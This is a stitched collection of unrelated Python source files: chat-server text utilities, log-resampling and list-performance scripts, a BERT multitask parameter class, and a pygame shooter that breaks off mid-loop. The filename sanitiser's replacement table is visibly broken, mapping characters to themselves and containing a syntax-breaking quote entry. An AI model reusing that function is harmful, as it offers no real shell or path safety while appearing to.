True for n, ch in enumerate(txt): # escape sequences can never contain ESC; # treat pend as regular text if so if ch == u"\033" and pend_txt: ret.extend(pend_ofs) counting = True pend_txt = None pend_ofs = [] if not counting: if ch in eoc: counting = True else: if pend_txt: pend_txt += ch pend_ofs.append(n) if pend_txt.startswith(u"\033["): counting = False else: ret.extend(pend_ofs) counting = True pend_txt = None pend_ofs = [] else: if ch == u"\033": pend_txt = u"{0}".format(ch) pend_ofs = [n] else: ret.append(n) return ret def sanitize_ctl_codes(aside): plain = u"" for pch in aside: nch = ord(pch) # print('read_cb inner {0} / {1}'.format(b2hex(pch.encode('utf-8', 'backslashreplace')), nch)) if nch < 0x20 and nch != 0x0B and nch != 0x0F: print("substituting non-printable \\x{0:02x}".format(nch)) plain += u"?" else: plain += pch return plain def sanitize_fn(fn): for bad, good in [ [u"<", u"<"], [u">", u">"], [u":", u":"], [u'"', u"""], [u"/", u"/"], [u"\\", u"\"], [u"|", u"|"], [u"?", u"?"], [u"*", u"*"], [u"'", u"'"], # shell-safety [u"`", u"`"], # shell-safety ]: fn = fn.replace(bad, good) if WINDOWS: bad = [u"con", u"prn", u"aux", u"nul"] for n in range(1, 10): bad += u"com{0} lpt{0}".format(n).split(u" ") if fn.lower() in bad: fn = u"_" + fn return fn FOREGROUNDS = {} for luma, chars in enumerate([u"01234567", u"89abcdef"]): for n, ch in enumerate(chars): FOREGROUNDS[ch] = u"\033[{0};3{1}".format(luma, n) BACKGROUNDS = {} for n, ch in enumerate(u"01234567"): BACKGROUNDS[ch] = u";4{0}".format(n) def convert_color_codes(txt, preview=False): foregrounds = FOREGROUNDS backgrounds = BACKGROUNDS scan_from = 0 while txt: ofs = txt.find(u"\x0b", scan_from) if ofs < 0: break scan_from = ofs + 1 fg = None if len(txt) > ofs + 1: fg = txt[ofs + 1] bg = None if len(txt) > ofs + 3 and txt[ofs + 2] == u",": bg = txt[ofs + 3] if fg in foregrounds: fg = foregrounds[fg] else: fg = None bg = None # can't set bg without valid fg if bg in backgrounds: bg = backgrounds[bg] else: bg = None resume_txt = ofs + 1 if fg: resume_txt += 1 scan_from = len(fg) + 1 if bg: resume_txt += 2 scan_from += len(bg) preview_k = u"" if preview: resume_txt = ofs + 1 if fg: preview_k = u"K" if fg and bg: txt = u"{0}{1}{2}m{3}{4}".format( txt[:ofs], fg, bg, preview_k, txt[resume_txt:] ) elif fg: txt = u"{0}{1}m{2}{3}".format(txt[:ofs], fg, preview_k, txt[resume_txt:]) else: txt = u"{0}K{1}".format(txt[:ofs], txt[resume_txt:]) scan_from = 0 while txt: ofs = txt.find(u"\x0f", scan_from) if ofs < 0: break scan_from = ofs + 1 txt = u"{0}\033[0m{2}{1}".format( txt[:ofs], txt[scan_from:], u"O" if preview else u"" ) return txt # B35_CHARS = tuple(u'0123456789abcdefghijkmnopqrstuvwxyz') B35_CHARS = tuple(u"abcdefghijkmnopqrstuvwxyz") B35_ATLAS = dict((c, i) for i, c in enumerate(B35_CHARS)) B35_BASE = len(B35_CHARS) def b35enc(number): if not number: return B35_CHARS[0] prefix = u"" if number < 0: prefix = u"-" number = abs(number) ret = u"" while number: number, rem = divmod(number, B35_BASE) ret = B35_CHARS[rem] + ret return prefix + ret def b35dec(b35str): factor = 1 if b35str.startswith(u"-"): b35str = b35str[1:] factor = -1 ret = 0 for c in b35str: ret = ret * B35_BASE + B35_ATLAS[c] return factor * ret def visualize_all_unicode_codepoints_as_utf8(): stats = [0] * 256 nmax = sys.maxunicode + 1 print("collecting all codepoints until {0}d, 0x{1:x}".format(nmax, nmax)) if PY2: to_unicode = unichr # noqa: F821 from_char = ord else: to_unicode = chr from_char = int for n in range(nmax): if n % 0x10000 == 0: print( "at codepoint {0:6x} of {1:6x}, {2:5.2f}%".format( n, nmax, (100.0 * n) / nmax ) ) ch = to_unicode(n) try: bs = ch.encode("utf-8") except: # python2 allows encoding ud800 as \xed\xa0\x80 which is an illegal sequence in utf8; # python -c "for x in unichr(0xd800).encode('utf-8'): print '{0:2x}'.format(ord(x))" continue for b in bs: stats[from_char(b)] += 1 print() for i, n in enumerate(stats): v = n if v == 0: v = "illegal value" elif v == 1: v = "single-use value" print("byte 0x{0:2x} occurences: {1}".format(i, v)) print() # visualize_all_unicode_codepoints_as_utf8() def wrap(txt, maxlen, maxlen2): words = txt.rstrip().split() ret = [] for word in words: if len(word) * 2 < maxlen or visual_length(word) < maxlen: ret.append(word) else: while visual_length(word) >= maxlen: ret.append(word[: maxlen - 1] + u"-") word = word[maxlen - 1 :] if word: ret.append(word) words = ret ret = [] ln = u"" spent = 0 for word in words: wl = visual_length(word) if spent + wl > maxlen: ret.append(ln[1:]) maxlen = maxlen2 spent = 0 ln = u"" ln += u" " + word spent += wl + 1 if ln: ret.append(ln[1:]) return ret def whoops(extra=None): msg = r""" __ _ __/ /_ ____ ____ ____ _____ | | /| / / __ \/ __ \/ __ \/ __ \/ ___/ | |/ |/ / / / / /_/ / /_/ / /_/ (__ ) |__/|__/_/ /_/\____/\____/ .___/____/ /_/""" exc = traceback.format_exc() if exc.startswith("None"): exc = "".join(traceback.format_stack()[:-1]) msg = "{0}\r\n{1}\r\n{2}</stack>".format(msg[1:], exc.rstrip(), "-" * 64) print(msg) if extra: print(" {0}\n{1}\n".format(extra, "-" * 64)) def t_a_a_bt(): ret = [] for tid, stack in sys._current_frames().items(): ret.append(u"\r\nThread {0} {1}".format(tid, "=" * 64)) for fn, lno, func, line in traceback.extract_stack(stack): ret.append(u' File "{0}", line {1}, in {2}'.format(fn, lno, func)) if line: ret.append(u" {0}".format(line.strip())) return u"\r\n".join(ret) thread_monitor_enabled = False def monitor_threads(): global thread_monitor_enabled if thread_monitor_enabled: return thread_monitor_enabled = True def stack_collector(): while True: print("capturing stack") time.sleep(5) txt = t_a_a_bt() with open("r0c.stack", "wb") as f: f.write(txt.encode("utf-8")) thr = threading.Thread(target=stack_collector, name="stk_col") thr.daemon = True thr.start() def host_os(): py_ver = ".".join([str(x) for x in sys.version_info]) ofs = py_ver.find(".final.") if ofs > 0: py_ver = py_ver[:ofs] bitness = struct.calcsize("P") * 8 host_os = platform.system() return "{0} on {1}{2}".format(py_ver, host_os, bitness) def compat_chans_in_root(): bad_dirs = [] good_dirs = ["pm", "chan", "wire"] for (dirpath, dirnames, filenames) in os.walk(EP.log): for d in dirnames: if d not in good_dirs: bad_dirs.append(d) break if bad_dirs: print() print("== performing upgrade in 5 seconds ==") print() print("Will move the following directories from [log] to [log/chan]:") print(", ".join(bad_dirs)) print() print("PRESS CTRL-C TO ABORT") for n in range(5): print("{0} ...".format(5 - n)) time.sleep(1) for d in bad_dirs: os.rename("{0}{1}".format(EP.log, d), "{0}chan/{1}".format(EP.log, d)) print("upgrade done \\o/") print() def py26_threading_event_wait(event): """ threading.Event.wait() is broken on py2.6; with multiple subscribers it doesn't always trigger """ if ( sys.version_info[:2] != (2, 6) or INTERP != "CPython" or "_Event__flag" not in event.__dict__ ): return def nice_meme(timeout=None): if event._Event__flag: return True time.sleep(0.2) return event._Event__flag event.wait = nice_meme """ # --------------------------------------------------------------------- # dumping ground for mostly useless code below def test_ansi_annotation(): rangetype = range try: rangetype = xrange # noqa: F405,F821 except: pass ansi_txt = ( "\033[1;33mHello \033[1;32mWorld\033[0m! This \033[7mis\033[0m a test.\033[A" ) ansi_txt = "\033[mf\033[s\033[w\033[has\033[3451431613gt\033[m \033[s\033[g\033[s\033[g\033[s\033[gcod\033[me\033[x" rv = visual_indices(ansi_txt) print(" ".join(ansi_txt.replace("\033", "*"))) print(" ".join([str(x % 10) for x in rangetype(len(ansi_txt))])) print(" ".join([str(x) for x in rv])) print("{0} {1}".format(visual_length(ansi_txt), len(rv))) visual = "" for ofs in rv: visual += ansi_txt[ofs] print("[{0}]".format(visual)) for outer_n in rangetype(3): t0 = time.time() for n in rangetype(100000): rv = visual_indices(ansi_txt) print(str(time.time() - t0)) t0 = time.time() for n in rangetype(100000): rv = visual_length(ansi_txt) print(str(time.time() - t0)) """ ``` #### File: test/analysis/resample-log.py ```python from __future__ import print_function NUM_INPUT_COLS = 4 import re import sys def eprint(*args, **kwargs): kwargs["file"] = sys.stderr print(*args, **kwargs) if len(sys.argv) < 2: eprint("need argument 1: graph to resample+derive") sys.exit(1) fn = sys.argv[1] # 1516048842.772 j 3324 p 3301 m 220488 d 168,167,9966 fmt_in = re.compile( r"^[0-9]{6} ([0-9\.]+) j ([0-9]+) p ([0-9]+) m ([0-9]+) d ([0-9]+),([0-9]+),([0-9]+)$" ) rows = [] with open(fn, "rb") as f: for ln in f: m = fmt_in.match(ln.decode("utf-8").strip()) if not m: continue rows.append([float(x) for x in m.groups()]) n = -1 rows2 = [] for r2, r in zip(rows[:-1], rows[1:]): n += 1 diff = 0 for col in range(NUM_INPUT_COLS): if r[col] - r2[col] > 10: rows2 = rows[n:] if rows2: break rows = rows2 if not rows: eprint("\n\n too slow my dude\n") sys.exit(1) def resample(rows): ret = [] for r2, r in zip(rows[:-1], rows[1:]): r2 = r2[:NUM_INPUT_COLS] r = r[:NUM_INPUT_COLS] # difference between r2 and r rd = [] for v2, v in zip(r2, r): rd.append(v - v2) # extract timestamp ts2 = r2[0] ts = r[0] its2 = int(ts2) its = int(ts) # skip row if timestamp floors to the same if its2 == its: continue # all whole seconds between r2 and r for isec in range(its2 + 1, its + 1): # eprint() # eprint('r2: ' + ''.join('{0} '.format(x) for x in r2)) # eprint('r: ' + ''.join('{0} '.format(x) for x in r)) # eprint('rd: ' + ''.join('{0} '.format(x) for x in rd)) # eprint('isec {0} [{1}..{2}]'.format(isec, its2+1, its+1)) row = [] mul = (isec * 1.0 - ts2) / (ts * 1.0 - ts2) for n, rv in enumerate(r): row.append(r2[n] + (rv - r2[n]) * mul) # eprint('ri: ' + ''.join('{0} '.format(x) for x in row)) ret.append(row) return ret def derivate(rows): ret = [] for r2, r in zip(rows[:-1], rows[1:]): rd = [r2[0]] for v2, v in zip(r2[1:], r[1:]): rd.append(v - v2) ret.append(rd) return ret rows = resample(rows) rows = derivate(rows) if not rows: eprint("parsing failed") sys.exit(1) # start counting time from 0 epoch = round(rows[0][0]) for n in range(len(rows)): rows[n][0] = int(round(rows[n][0]) - epoch) for row in rows: print("{0:<6d} {1:8.2f} {2:8.2f} {3:8.2f}".format(*row)) ``` #### File: test/prototyping/list-perf.py ```python import time t0 = 0 def td(msg): global t0 t1 = time.time() print("{0} {1:.6f} {2}\n".format(t1, t1 - t0, msg)) t0 = t1 class Foo(object): def __init__(self, n): self.n = n self.v2 = int(n * 1.3) td("started") n_mb = 24 haystack = [] needle = None needle_at = int(n_mb * 1024 * 1024 * 0.74) for n1 in range(n_mb): print(n_mb, n1) for n2 in range(1024): for n3 in range(1024): n = (n1 * 1024 + n2) * 1024 + n3 haystack.append(Foo(n)) if n == needle_at: needle = haystack[-1] td("built list") # print(haystack.index(needle)) # td('find needle') print(haystack[needle_at]) td("get abs pos needle") print(haystack[int(0.31 * n_mb * 1024 * 1024)]) td("get abs pos other") # py2 58.6% ram # 1515537393.86 25.088947 built list # 1515537394.18 0.313340 find needle # 1515537394.18 0.000040 get abs pos # py3 31.7% ram # 1515537445.5261745 21.067613 built list # 1515537445.7479792 0.221805 find needle # 1515537445.7480137 0.000035 get abs pos # ^ without v2 member # | # v with v2 member # py2 62.3% ram # 1515537643.67 29.696990 built list # 1515537643.67 0.000044 get abs pos needle # 1515537643.67 0.000017 get abs pos other # py3 36.5% ram # 1515537590.0602984 27.699614 built list # 1515537590.0603702 0.000072 get abs pos needle # 1515537590.060382 0.000012 get abs pos other ```
{ "source": "90217/bert-multitask-learning", "score": 2 }
#### File: bert-multitask-learning/bert_multitask_learning/params.py ```python import os import re import json import shutil from .modeling import BertConfig from . import data_preprocessing from .utils import create_path, EOS_TOKEN, get_or_make_label_encoder class BaseParams(): def __init__(self): self.run_problem_list = [] self.problem_type = { 'weibo_ner': 'seq_tag', 'weibo_fake_cls': 'cls', 'weibo_cws': 'seq_tag', 'weibo_pretrain': 'pretrain', 'cws': 'seq_tag', 'NER': 'seq_tag', 'ctb_pos': 'seq_tag', 'ctb_cws': 'seq_tag', 'as_cws': 'seq_tag', 'msr_cws': 'seq_tag', 'pku_cws': 'seq_tag', 'city_cws': 'seq_tag', 'boson_ner': 'seq_tag', 'msra_ner': 'seq_tag', 'POS': 'seq_tag', 'weibo_fake_seq2seq_tag': 'seq2seq_tag', 'weibo_fake_seq_tag': 'seq_tag', 'ontonotes_ner': 'seq_tag', 'ontonotes_cws': 'seq_tag', 'ontonotes_chunk': 'seq2seq_tag', 'boson_domain': 'cls', 'Weibo_domain': 'cls', 'msra_domain': 'cls', 'as_domain': 'cls', 'msr_domain': 'cls', 'pku_domain': 'cls', 'cityu_domain': 'cls', 'emotion_analysis': 'cls', 'ontonotes_pos': 'seq_tag' } # specify this will make key reuse values top # that it, weibo_ner problem will use NER's top self.share_top = { 'ctb_cws': 'cws', 'as_cws': 'cws', 'msr_cws': 'cws', 'pku_cws': 'cws', 'city_cws': 'cws', 'ctb_pos': 'POS', 'boson_domain': 'ner_domain', 'Weibo_domain': 'ner_domain', 'msra_domain': 'ner_domain', 'as_domain': 'cws_domain', 'msr_domain': 'cws_domain', 'pku_domain': 'cws_domain', 'cityu_domain': 'cws_domain' } for p in self.problem_type: if p not in self.share_top: self.share_top[p] = p self.multitask_balance_type = 'data_balanced' # self.multitask_balance_type = 'problem_balanced' # logging control self.log_every_n_steps = 100 self.detail_log = True self.multiprocess = True self.decode_vocab_file = None self.eval_throttle_secs = 600 # training self.init_lr = 2e-5 self.batch_size = 32 self.train_epoch = 15 self.freeze_step = 0 self.prefetch = 5000 self.dynamic_padding = True self.bucket_batch_sizes = [32, 32, 32, 16] self.bucket_boundaries = [30, 64, 128] # hparm self.dropout_keep_prob = 0.9 self.max_seq_len = 256 self.use_one_hot_embeddings = True self.label_smoothing = 0.0 self.crf = False self.bert_num_hidden_layer = 12 self.hidden_dense = False # seq2seq self.decoder_num_hidden_layers = 3 self.beam_size = 10 self.init_decoder_from_encoder = False self.beam_search_alpha = 0.6 self.decode_max_seq_len = 90 # multitask training self.label_transfer = False self.augument_mask_lm = False self.augument_rate = 0.5 self.distillation = False # dep since not good # self.mutual_prediction = False self.grid_transformer = False self.task_transformer = False self.mean_gradients = False # random replace punctuation by some prob to # ease the punctuation sensitive problem self.punc_replace_prob = 0.0 self.punc_list = list(',.!?!。?,、') self.hidden_gru = False self.label_transfer_gru = False # if None, we will use the same hidden_size as inputs # e.g. # of labels self.label_transfer_gru_hidden_size = None # bert config self.init_checkpoint = 'chinese_L-12_H-768_A-12' # pretrain hparm self.dupe_factor = 10 self.short_seq_prob = 0.1 self.masked_lm_prob = 0.15 self.max_predictions_per_seq = 20 self.mask_lm_hidden_size = 768 self.mask_lm_hidden_act = 'gelu' self.mask_lm_initializer_range = 0.02 self.train_problem = None self.tmp_file_dir = 'tmp' # get generator function for each problem self.read_data_fn = {} for problem in self.problem_type: try: self.read_data_fn[problem] = getattr( data_preprocessing, problem) except AttributeError: raise AttributeError( '%s function not implemented in data_preprocessing.py' % problem) self.problem_assigned = False def add_problem(self, problem_name, problem_type='cls', processing_fn=None, share_top=None): if problem_type not in ['cls', 'seq_tag', 'seq2seq_tag', 'seq2seq_text', 'multi_cls']: raise ValueError('Provided problem type not valid, expect {0}, got {1}'.format( ['cls', 'seq_tag', 'seq2seq_tag', 'seq2seq_text', 'multi_cls'], problem_type)) self.problem_type[problem_name] = problem_type self.read_data_fn[problem_name] = processing_fn if share_top is not None: self.share_top[problem_name] = share_top else: self.share_top[problem_name] = problem_name def assign_problem(self, flag_string: str, gpu=2, base_dir=None, dir_name=None, is_serve=False): """Assign the actual run problem to param. This function will do the following things: 1. parse the flag string to form the run_problem_list 2. create checkpoint saving path 3. calculate total number of training data and training steps 4. scale learning rate with the number of gpu linearly Arguments: flag_string {str} -- run problem string example: cws|POS|weibo_ner&weibo_cws Keyword Arguments: gpu {int} -- number of gpu use for training, this will affect the training steps and learning rate (default: {2}) base_dir {str} -- base dir for ckpt, if None, then "models" is assigned (default: {None}) dir_name {str} -- dir name for ckpt, if None, will be created automatically (default: {None}) """ self.problem_assigned = True self.is_serve = is_serve self.problem_list = self.parse_problem_string(flag_string) # create dir and get vocab, config self.prepare_dir(base_dir, dir_name, self.problem_list) self.get_data_info(self.problem_list, self.ckpt_dir) if not is_serve: self.shuffle_buffer = min([200000, self.data_num]) for problem in self.problem_list: if self.problem_type[problem] == 'pretrain': dup_fac = self.dupe_factor break else: dup_fac = 1 self.train_steps = int(( self.data_num * self.train_epoch * dup_fac) / (self.batch_size*max(1, gpu))) self.num_warmup_steps = int(0.1 * self.train_steps) # linear scale learing rate self.lr = self.init_lr * gpu def to_json(self): dump_dict = {} for att_name, att in vars(self).items(): try: json.dumps(att) dump_dict[att_name] = att except TypeError: pass with open(self.params_path, 'w', encoding='utf8') as f: json.dump(dump_dict, f) def from_json(self, json_path=None): params_path = json_path if json_path is not None else self.params_path with open(params_path, 'r', encoding='utf8') as f: dump_dict = json.load(f) for att in dump_dict: setattr(self, att, dump_dict[att]) self.bert_config = BertConfig.from_dict(self.bert_config_dict) self.bert_config.num_hidden_layers = dump_dict['bert_num_hidden_layer'] def get_data_info(self, problem_list, base): '''Get number of data, number of classes of data and eos_id of data. Arguments: problem_list {list} -- problem list base {str} -- path to store data_info.json ''' json_path = os.path.join(base, 'data_info.json') if os.path.exists(json_path): data_info = json.load(open(json_path, 'r', encoding='utf8')) self.data_num_dict = data_info['data_num'] self.num_classes = data_info['num_classes'] self.eos_id = data_info['eos_id'] else: self.data_num_dict = {} self.num_classes = {} self.eos_id = {} if not self.is_serve: # update data_num and train_steps self.data_num = 0 for problem in problem_list: if problem not in self.data_num_dict or self.multiprocess: self.data_num_dict[problem] = len( list(self.read_data_fn[problem](self, 'train'))) self.data_num += self.data_num_dict[problem] else: self.data_num += self.data_num_dict[problem] data_info = { 'data_num': self.data_num_dict, 'num_classes': self.num_classes, 'eos_id': self.eos_id } json.dump(data_info, open(json_path, 'w', encoding='utf8')) return json_path def parse_problem_string(self, flag_string): '''Parse problem string Example: cws|POS|weibo_ner&weibo_cws self.run_problem_list = [{cws:seq_tag}, {POS:seq_tag}, {weibo_ner:seq_tag, weibo_cws:seq_tag}] problem_list = [cws, POS, weibo_ner, weibo_cws] Arguments: flag_string {str} -- problem string Returns: list -- problem list ''' self.problem_str = flag_string # Parse problem string self.run_problem_list = [] for flag_chunk in flag_string.split('|'): if '&' not in flag_chunk: problem_type = {} problem_type[flag_chunk] = self.problem_type[flag_chunk] self.run_problem_list.append(problem_type) else: problem_type = {} for problem in flag_chunk.split('&'): problem_type[problem] = self.problem_type[problem] self.run_problem_list.append(problem_type) # if (self.label_transfer or self.mutual_prediction) and self.train_problem is None: if self.train_problem is None: self.train_problem = [p for p in self.run_problem_list] problem_list = sorted(re.split(r'[&|]', flag_string)) return problem_list def prepare_dir(self, base_dir, dir_name, problem_list): base = base_dir if base_dir is not None else 'models' dir_name = dir_name if dir_name is not None else '_'.join( problem_list)+'_ckpt' self.ckpt_dir = os.path.join(base, dir_name) if not self.is_serve: create_path(self.ckpt_dir) self.params_path = os.path.join(self.ckpt_dir, 'params.json') try: shutil.copy2(os.path.join(self.init_checkpoint, 'vocab.txt'), self.ckpt_dir) shutil.copy2(os.path.join(self.init_checkpoint, 'bert_config.json'), self.ckpt_dir) except FileNotFoundError: pass self.vocab_file = os.path.join(self.ckpt_dir, 'vocab.txt') self.bert_config = BertConfig.from_json_file( os.path.join(self.ckpt_dir, 'bert_config.json')) self.bert_config.num_hidden_layers = self.bert_num_hidden_layer self.bert_config_dict = self.bert_config.__dict__ with open(self.vocab_file, 'r', encoding='utf8') as vf: self.vocab_size = len(vf.readlines()) class CRFParams(BaseParams): def __init__(self): super(CRFParams, self).__init__() self.crf = True class StaticBatchParams(BaseParams): def __init__(self): super(StaticBatchParams, self).__init__() self.dynamic_padding = False class DynamicBatchSizeParams(BaseParams): def __init__(self): super(DynamicBatchSizeParams, self).__init__() self.bucket_batch_sizes = [128, 64, 32, 16] ```
{ "source": "90327/Pygame", "score": 3 }
#### File: 90327/Pygame/main.py ```python import sys import time import traceback import pygame.mixer from pygame.locals import * import bullet import enemyplan import myplan import supply from enemyplan import * # 初始化 pygame.init() pygame.mixer.init() # 帧数对象创建 clock = pygame.time.Clock() # 设置屏幕大小 size = width, height = 512, 900 screen = pygame.display.set_mode(size) # 设置标题 pygame.display.set_caption('TylerXixi ------------现代飞机大战------------') # 载入图片 # 背景图片 background = pygame.image.load('image\\background\\1.jpg').convert_alpha() # ICO游戏图标 ico = pygame.image.load('image\\ICO\\J20.ico') pygame.display.set_icon(ico) # 暂停时图片 people_pause_image = pygame.image.load('image\\Pause\\j20_gaitubao_656x464.png').convert_alpha() font_image = pygame.image.load('image\\Pause\\font22.png').convert_alpha() # 载入游戏音效 # 主背景音乐 pygame.mixer.music.load('Wav\\back music\\backmusci.mp3') pygame.mixer.music.set_volume(0.03) # 达到四级背景音乐 level4_backmusic = pygame.mixer.Sound('Wav\\back music\\4级BGM.mp3') level4_backmusic.set_volume(0.1) # 达到6级背景音乐 level6_backmusic = pygame.mixer.Sound("Wav\\back music\\6级BGM.mp3") level6_backmusic.set_volume(0.2) supperbig_sound = pygame.mixer.Sound('Wav\\sound\\supperbig_sound.ogg') supperbig_sound.set_volume(0.03) big_sound = pygame.mixer.Sound('Wav\\sound\\big_sound.ogg') big_sound.set_volume(0.1) mid_sound = pygame.mixer.Sound('Wav\\sound\\mid_sound.ogg') mid_sound.set_volume(0.03) small_sound = pygame.mixer.Sound('Wav\\sound\\small_sound.ogg') small_sound.set_volume(0.03) appear_bigplan = pygame.mixer.Sound('Wav\\sound\\大飞机来咯-1_2.ogg') appear_bigplan.set_volume(0.05) die_Myplan = pygame.mixer.Sound('Wav\\sound\\哦豁-.ogg') die_Myplan.set_volume(0.05) GameOver_plan = pygame.mixer.Sound('Wav\\sound\\游戏结束-.ogg') GameOver_plan.set_volume(0.05) boom_sound = pygame.mixer.Sound('Wav\\sound\\核弹.ogg') boom_sound.set_volume(0.5) supply_appear = pygame.mixer.Sound('Wav\\sound\\补给箱已经-.ogg') supply_appear.set_volume(0.05) get_bomb = pygame.mixer.Sound('Wav\\sound\\获得核弹.ogg') get_bomb.set_volume(0.05) too_much_bomb = pygame.mixer.Sound('Wav\\sound\\最大炸弹量.ogg') too_much_bomb.set_volume(0.05) too_much_life = pygame.mixer.Sound('Wav\\sound\\最大生命值.ogg') too_much_life.set_volume(0.05) get_bullet = pygame.mixer.Sound('Wav\\sound\\获得子弹.ogg') get_bullet.set_volume(0.05) get_life = pygame.mixer.Sound('Wav\\sound\\获得生命.ogg') get_life.set_volume(0.05) launch_bullet = pygame.mixer.Sound('Wav\\sound\\普通子弹发射.ogg') launch_bullet.set_volume(0.01) # 等级音效 level2_sound = pygame.mixer.Sound('Wav\\sound\\二级.ogg') level2_sound.set_volume(0.1) level3_sound = pygame.mixer.Sound('Wav\\sound\\三级_1_1.ogg') level3_sound.set_volume(0.1) level4_sound = pygame.mixer.Sound('Wav\\sound\\四级_1_1.ogg') level4_sound.set_volume(0.1) level5_sound = pygame.mixer.Sound('Wav\\sound\\五级_1_1.ogg') level5_sound.set_volume(0.1) level6_sound = pygame.mixer.Sound('Wav\\sound\\六级_1_1.ogg') level6_sound.set_volume(0.1) # 血条颜色定义 BLACK = (0, 0, 0) RED = (224, 30, 30) GREEN = (24, 220, 24) WHITE = (255, 255, 255) Font_color = (191, 239, 255) # 添加小型敌机 def add_small_enemy(group1, group2, num): for i in range(num): # 实例化敌方飞机 e1 = enemyplan.SmallPlan(size) group1.add(e1) group2.add(e1) # 添加中型敌机 def add_mid_enemy(group1, group2, num): for i in range(num): e2 = enemyplan.MidPlan(size) group1.add(e2) group2.add(e2) # 添加大型敌机 def add_big_enemy(group1, group2, num): for i in range(num): e3 = enemyplan.BigPlan(size) group1.add(e3) group2.add(e3) # 定义敌机的速度 def inc_speed(target, inc): for each in target: each.speed += inc def main(): # 整除对象 delay = 100 # 等级设置 level = 1 # 分数设置 score = 0 # 分数字体设置 score_font = pygame.font.Font('Font\\HYZhuZiMuTouRenW.ttf', 40) # 控制图片状态 switch_image = True # 循环状态 running = True # 控制暂停状态 pause = False # 控制声音状态 voice_pause = False # 控制文件打开次数 recorded = False # 导入暂停图片 pause_nor_image = pygame.image.load('image\\Pause\\not pause_white.png').convert_alpha() pause_pressd_image = pygame.image.load('image\\Pause\\not pause_gray.png').convert_alpha() resumer_nor_image = pygame.image.load('image\\Pause\\resumer_white.png').convert_alpha() resumer_pressd_image = pygame.image.load('image\\Pause\\resumer_gray.png').convert_alpha() # 导入声音图片 voice_image_blue = pygame.image.load('image\\voice\\voice (1)_gaitubao_66x66.png').convert_alpha() voice_image_green = pygame.image.load('image\\voice\\voice (2)_gaitubao_66x66.png').convert_alpha() pause_voice_image_blue = pygame.image.load('image\\voice\\pause_voice (1)_gaitubao_66x66.png').convert_alpha() pause_voice_image_green = pygame.image.load('image\\voice\\pause_voice (2)_gaitubao_66x66.png').convert_alpha() # 导入结束、重开、GameOver、logo图片 end_image = pygame.image.load('image\\restart\\G2.png').convert_alpha() end_rect = end_image.get_rect() again_image = pygame.image.load("image\\restart\\重新开始.png").convert_alpha() again_rect = again_image.get_rect() gameover_image = pygame.image.load("image\\restart\\结束游戏.png").convert_alpha() gameover_rect = gameover_image.get_rect() logo_image = pygame.image.load('image\\restart\\ico.png').convert_alpha() logo_font = pygame.image.load('image\\restart\\LogoFont.png').convert_alpha() # 结束字体 gameover_font = pygame.font.Font("Font\\华文圆体 REGULAR.TTF", 48) # 导入复活图片 reset_life = pygame.image.load('image\\life\\Rese_life.png').convert_alpha() reset_font_image = pygame.image.load('image\\life\\reset_font_life.png').convert_alpha() # 导入生命UI图标 life_image = pygame.image.load('image\\boom\\LIFE.png').convert_alpha() # 获取生命图标矩形位置 life_rect = life_image.get_rect() # 设置生命剩余字体 life_font = pygame.font.Font('Font\\华文圆体 REGULAR.TTF', 45) # 生命数量 life_num = 3 # 导入炸弹UI图标 boom_image = pygame.image.load('image\\boom\\BOOM.png').convert_alpha() # 获取炸弹的矩形位置 boom_rect = boom_image.get_rect() # 设置炸弹剩余字体 boom_font = pygame.font.Font('Font\\华文圆体 REGULAR.TTF', 45) # 设置炸弹的数量 boom_num = 3 # 实例化补给包 # 子弹补给 bullet_supply = supply.BulletSupply(size) # 核弹补给 bomb_supply = supply.BombSupply(size) # 生命补给 life_supply = supply.LifeSupply(size) # 设置每40秒放发任意一个补给包 supply_timer = USEREVENT pygame.time.set_timer(supply_timer, 40 * 1000) # 设置超级子弹的发射时间 double_bullet_timer = USEREVENT + 1 # 设置无敌时间 invincible_timer = USEREVENT + 2 # 标准是否使用超级子弹 is_double_bullet = False # 获取pause图片的矩形 paused_rect = pause_pressd_image.get_rect() # 初始化图片的位置 paused_rect.left, paused_rect.top = width - paused_rect.width - 5, 5 # 默认显示图标 paused_image = pause_nor_image # 获取声音矩形图像 voice_rect = voice_image_blue.get_rect() # 初始化图像位置 voice_rect.left, voice_rect.top = width - voice_rect.width - 5, 75 # 默认显示图 voice_image = voice_image_blue # # 播放背景音乐: pygame.mixer.music.play(-1) # 生成我方飞机 me = myplan.MyPlan(size) # 生成普通子弹 设置添加子弹的列表 bullet1 = [] # 添加图片索引 bullet1_index = 0 # 添加子弹数量 bullet1_nums = 7 # 将子弹迭代拿出并添加到列表 for i in range(bullet1_nums): bullet1.append(bullet.Bullet1(me.rect.midtop)) # 生成超级子弹 # 设置添加子弹的列表 bullet2 = [] # 添加图片索引 bullet2_index = 0 # 添加子弹数量 bullet2_nums = 12 # 将子弹迭代拿出并添加到列表 for i in range(bullet2_nums//2): bullet2.append(bullet.Bullet2((me.rect.centerx-55, me.rect.centery))) bullet2.append(bullet.Bullet2((me.rect.centerx+20, me.rect.centery))) # 生成敌方飞机 enemys = pygame.sprite.Group() # 生成小型敌机 small_enemy = pygame.sprite.Group() add_small_enemy(small_enemy, enemys, 14) # 生成中型飞机 mid_enemy = pygame.sprite.Group() add_mid_enemy(mid_enemy, enemys, 6) # 生成大型飞机 big_enemy = pygame.sprite.Group() add_big_enemy(big_enemy, enemys, 2) # 中弹图片索引 small_destory_index = 0 mid_destory_index = 0 big_destory_index = 0 me_destory_index = 0 while running: for event in pygame.event.get(): if event.type == pygame.QUIT: sys.exit() elif event.type == MOUSEBUTTONDOWN: if event.button == 1 and paused_rect.collidepoint(event.pos): pause = not pause # 暂停游戏所有音效 if pause: pygame.time.set_timer(supply_timer, 0) pygame.mixer.music.pause() pygame.mixer.pause() else: pygame.time.set_timer(supply_timer, 40*1000) pygame.mixer.music.unpause() pygame.mixer.unpause() elif event.type == MOUSEMOTION: if paused_rect.collidepoint(event.pos): if pause: paused_image = resumer_pressd_image else: paused_image = pause_pressd_image else: if pause: paused_image = resumer_nor_image else: paused_image = pause_nor_image # 声音控制 elif event.type == MOUSEBUTTONDOWN: if event.button == 1 and voice_rect.collidepoint(event.pos): voice_pause = not voice_pause elif event.type == MOUSEMOTION: if voice_rect.collidepoint(event.pos): if voice_pause: voice_image = pause_pressd_image else: voice_image = voice_image_green else: if voice_pause: voice_image = pause_voice_image_blue else: voice_image = voice_image_blue elif event.type == KEYDOWN: if event.key == K_SPACE: if boom_num: # 炸弹减一 boom_num -= 1 # 播放炸弹音效 boom_sound.play() for each in enemys: # 如果敌机在底部的上面将全部毁灭 if each.rect.bottom > 0: each.active = False # 判断补给箱是否触发 elif event.type == supply_timer: supply_appear.play() main_value = randint(0, 20) if main_value % 3 == 0: bomb_supply.reset() if main_value % 3 == 1: 